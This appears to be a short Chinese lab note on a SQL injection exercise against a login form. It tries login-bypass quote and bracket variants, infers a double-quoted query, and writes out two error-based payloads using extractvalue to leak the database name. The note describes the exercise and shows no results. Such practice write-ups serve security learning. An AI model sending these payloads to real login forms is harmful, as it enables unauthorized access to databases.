首先我们查看万能密码变形(对第一个1进行各种引号括号变形)当发现使用双引号进行闭合时发现如下错
对于上面的报错 首先怀疑 where username = “usernmae” and password = “ps”
那本地数据库对语句进行演练。
好了那我们尝试构造一下上面的语句吧。
我们进行了如下构造
uname=1") and extractvalue(1,concat(0x7e,(select database()))) #&passwd=&submit=Submit
结果如下:
看别人的博客也可以这样构造:
admin" and extractvalue(1,concat(0x7e,(select database()))) and "
结果也是ok的。
还有就是万能密码也是可以的